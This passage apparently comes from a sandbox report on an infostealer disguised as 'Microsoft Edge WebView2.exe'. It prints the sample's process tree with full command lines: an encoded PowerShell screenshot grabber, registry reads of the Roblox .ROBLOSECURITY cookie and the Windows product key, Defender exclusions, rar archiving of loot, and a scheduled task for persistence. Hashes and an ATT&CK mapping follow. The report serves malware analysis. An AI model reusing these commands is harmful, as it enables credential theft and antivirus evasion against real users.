C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="4⤵
- Suspicious use of WriteProcessMemory
PID:4472 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2856 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\fujbtodb\fujbtodb.cmdline"6⤵PID:3456
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7EC5.tmp" "c:\Users\Admin\AppData\Local\Temp\fujbtodb\CSC368E56C5ED524A89BC5282FFF5A3872B.TMP"7⤵PID:3388
-
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"4⤵
- Suspicious use of WriteProcessMemory
PID:5064 -
C:\Windows\system32\tree.comtree /A /F5⤵PID:4344
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"4⤵
- Suspicious use of WriteProcessMemory
PID:2528 -
C:\Windows\system32\tree.comtree /A /F5⤵PID:3180
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"4⤵
- Suspicious use of WriteProcessMemory
PID:2284 -
C:\Windows\system32\tree.comtree /A /F5⤵PID:1736
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"4⤵PID:4844
-
C:\Windows\system32\tree.comtree /A /F5⤵PID:768
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"4⤵PID:1516
-
C:\Windows\system32\tree.comtree /A /F5⤵PID:3576
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"4⤵PID:2784
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4732
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"4⤵PID:3876
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4064
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "getmac"4⤵PID:2932
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:4472
-
-
C:\Windows\system32\getmac.exegetmac5⤵PID:4264
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI9482\rar.exe a -r -hp"Linesk" "C:\Users\Admin\AppData\Local\Temp\0gxyD.zip" *"4⤵PID:4612
-
C:\Users\Admin\AppData\Local\Temp\_MEI9482\rar.exeC:\Users\Admin\AppData\Local\Temp\_MEI9482\rar.exe a -r -hp"Linesk" "C:\Users\Admin\AppData\Local\Temp\0gxyD.zip" *5⤵
- Executes dropped EXE
PID:1168
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic os get Caption"4⤵PID:4432
-
C:\Windows\System32\Wbem\WMIC.exewmic os get Caption5⤵
- Suspicious use of AdjustPrivilegeToken
PID:2132
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"4⤵PID:936
-
C:\Windows\System32\Wbem\WMIC.exewmic computersystem get totalphysicalmemory5⤵PID:5036
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"4⤵PID:548
-
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid5⤵PID:828
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"4⤵PID:2112
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:1648
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"4⤵PID:4788
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name5⤵
- Detects videocard installed
PID:4400
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"4⤵PID:2860
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault5⤵
- Suspicious behavior: EnumeratesProcesses
PID:4180
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Microsoft Edge WebView2.exe"C:\Users\Admin\AppData\Local\Temp\Microsoft Edge WebView2.exe"2⤵
- Checks computer location settings
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:3484 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Microsoft Edge WebView2.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2908 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:2188
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Microsoft Edge WebView2.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4056
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\msedgewebview2.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1516
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'msedgewebview2.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5008
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "msedgewebview2" /tr "C:\Users\Admin\AppData\Roaming\msedgewebview2.exe"3⤵
- Scheduled Task/Job: Scheduled Task
PID:3064
-
-
-
C:\Users\Admin\AppData\Roaming\msedgewebview2.exeC:\Users\Admin\AppData\Roaming\msedgewebview2.exe1⤵
- Executes dropped EXE
PID:5104
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /41⤵
- Checks SCSI registry key(s)
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4776
-
C:\Users\Admin\AppData\Roaming\msedgewebview2.exeC:\Users\Admin\AppData\Roaming\msedgewebview2.exe1⤵
- Executes dropped EXE
PID:768
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:1900
-
C:\Users\Admin\AppData\Roaming\msedgewebview2.exeC:\Users\Admin\AppData\Roaming\msedgewebview2.exe1⤵
- Executes dropped EXE
PID:3372
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Event Triggered Execution
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Event Triggered Execution
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Modify Registry
1Obfuscated Files or Information
1Command Obfuscation
1Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
3Credentials In Files
3Discovery
Browser Information Discovery
1Peripheral Device Discovery
1Process Discovery
1Query Registry
3System Information Discovery
5System Location Discovery
1System Language Discovery
1System Network Configuration Discovery
1Wi-Fi Discovery
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
944B
MD577d622bb1a5b250869a3238b9bc1402b
SHA1d47f4003c2554b9dfc4c16f22460b331886b191b
SHA256f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb
SHA512d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9
-
Filesize
944B
MD56d3e9c29fe44e90aae6ed30ccf799ca8
SHA1c7974ef72264bbdf13a2793ccf1aed11bc565dce
SHA2562360634e63e8f0b5748e2c56ebb8f4aa78e71008ea7b5c9ca1c49be03b49557d
SHA51260c38c4367352537545d859f64b9c5cbada94240478d1d039fd27b5ecba4dc1c90051557c16d802269703b873546ead416279c0a80c6fd5e49ad361cef22596a
-
Filesize
1KB
MD55da75924b097c993fdadd6105ac95afc
SHA1adf57bf4e8b25c3b0f6d10824940aca90b4c2d5b
SHA256624e2e7b83ef7f854b40994fab63efa8ec7f08eee2b3b81eb21e3b421268456d
SHA5126eb235628cac4e4dbf60eae0bd398f9514f1ece8643f91cc73dc54e6b864ebe1f1f211954debb6c3e3c7810a4353152dd3a2563f6b4baeb8ede5bd04f4032f58
-
Filesize
944B
MD522310ad6749d8cc38284aa616efcd100
SHA1440ef4a0a53bfa7c83fe84326a1dff4326dcb515
SHA25655b1d8021c4eb4c3c0d75e3ed7a4eb30cd0123e3d69f32eeb596fe4ffec05abf
SHA5122ef08e2ee15bb86695fe0c10533014ffed76ececc6e579d299d3365fafb7627f53e32e600bb6d872b9f58aca94f8cb7e1e94cdfd14777527f7f0aa019d9c6def
-
Filesize
944B
MD534f595487e6bfd1d11c7de88ee50356a
SHA14caad088c15766cc0fa1f42009260e9a02f953bb
SHA2560f9a4b52e01cb051052228a55d0515911b7ef5a8db3cf925528c746df511424d
SHA51210976c5deaf9fac449e703e852c3b08d099f430de2d7c7b8e2525c35d63e28b890e5aab63feff9b20bca0aaf9f35a3ba411aee3fbeee9ea59f90ed25bd617a0b
-
Filesize
6.9MB
MD52522b80294787ada26e108125a3c90ca
SHA175b1b1aec84a802cddbea81224e853ab9b394f6b
SHA25649ea5eb89592cc0f4a4291c3bad5281b3cc1f8a944086c2e9df6197ca48dc9e2
SHA512f1e15e312292357b5f73e4d180a6c143d41aadc56607bb582a21ebc03ad78814ae6a850feb6a327a65ee1312e1efd45de740b2da30cdc6e1d9bf6b48270733e1
-
Filesize
65KB
MD54f361c837acb296ee6dda2c9528ece7a
SHA1044a151c432f28bb42ea2f375f8a7648c50ba96f
SHA256b8977b03d3158a58a8299e3c1c6148bf21b767a26259936832bbc7d3fe0f265e
SHA5129bac2cd1d5033dfbf094410c36691c94b0bef7ecc3e740cfa2e44ea3023a33f162b90f5fb858018a485ee541108625edd0ba8f4e7859b20549c4191627363978
-
Filesize
1KB
MD5a84be741058d2495fd808fb91e75a9b4
SHA1702b17897200e1f1fd7af38a4002860cf09ae660
SHA256a56f705c92decc61f23164894e00a152126b302f029e65bc72cdef5d1e3c57f5
SHA5124cdab138d278c240a8766dc48361da4056020fb5d28d48942e88807939cd2ecd9e84e0ca6cf17c1bdd6a882078e7db5c857a6a2faf79052ee70e01884e8d81f0
-
Filesize
106KB
MD54585a96cc4eef6aafd5e27ea09147dc6
SHA1489cfff1b19abbec98fda26ac8958005e88dd0cb
SHA256a8f950b4357ec12cfccddc9094cca56a3d5244b95e09ea6e9a746489f2d58736
SHA512d78260c66331fe3029d2cc1b41a5d002ec651f2e3bbf55076d65839b5e3c6297955afd4d9ab8951fbdc9f929dbc65eb18b14b59bce1f2994318564eb4920f286
-
Filesize
48KB
MD5554b7b0d0daca993e22b7d31ed498bc2
SHA1ea7f1823e782d08a99b437c665d86fa734fe3fe4
SHA2561db14a217c5279c106b9d55f440ccf19f35ef3a580188353b734e3e39099b13f
SHA5124b36097eddd2c1d69ac98c7e98eebe7bb11a5117249ad36a99883732f643e21ecf58e6bea33b70974d600563dc0b0a30bead98bafb72537f8374b3d67979e60a
-
Filesize
58KB
MD5d603c8bfe4cfc71fe5134d64be2e929b
SHA1ff27ea58f4f5b11b7eaa1c8884eac658e2e9248b
SHA2565ee40bcaab13fa9cf064ecae6fc0da6d236120c06fa41602893f1010efaa52fe
SHA512fcc0dbfbe402300ae47e1cb2469d1f733a910d573328fe7990d69625e933988ecc21ab22f432945a78995129885f4a9392e1cee224d14e940338046f61abe361
-
Filesize
106KB
MD59cef71be6a40bc2387c383c217d158c7
SHA1dd6bc79d69fc26e003d23b4e683e3fac21bc29cb
SHA256677d9993bb887fef60f6657de6c239086ace7725c68853e7636e2ff4a8f0d009
SHA51290e02054163d44d12c603debdc4213c5a862f609617d78dd29f7fd21a0bae82add4ceaf30024da681c2a65d08a8142c83eb81d8294f1284edfbeeb7d66c371c8
-
Filesize
35KB
MD532df18692606ce984614c7efda2eec27
SHA186084e39ab0aadf0ecfb82ce066b7bf14152961e
SHA256b7c9c540d54ab59c16936e1639c6565cd35a8ca625f31753e57db9cbd0ee0065
SHA512679f8956370edc4dee32475d8440a2d2f9b6dd0edd0e033e49fed7834a35c7ed51ccde0995d19ed0a559a4383b99ae8c11e4e686902db12a2a5e0a3f2c0f4a9d
-
Filesize
85KB
MD501629284f906c40f480e80104158f31a
SHA16ab85c66956856710f32aed6cdae64a60aea5f0f
SHA256a201ec286b0233644ae62c6e418588243a3f2a0c5a6f556e0d68b3c747020812
SHA512107a4e857dd78dd92be32911e3a574f861f3425e01ab4b1a7580ac799dc76122ce3165465d24c34ac7fc8f2810547ad72b4d4ba3de76d3d61ed9bf5b92e7f7d4
-
Filesize
25KB
MD54a313dc23f9d0a1f328c74dd5cf3b9ab
SHA1494f1f5ead41d41d324c82721ab7ca1d1b72c062
SHA2562163010bfde88a6cc15380516d31955935e243b7ad43558a89380bf5fe86337e
SHA51242c712b758b35c0005b3528af586233298c2df4ed9f5133b8469bca9ec421ab151ce63f3929898c73d616cd9707594fa5f96d623fc150e214a4b2276c23c296e
-
Filesize
43KB
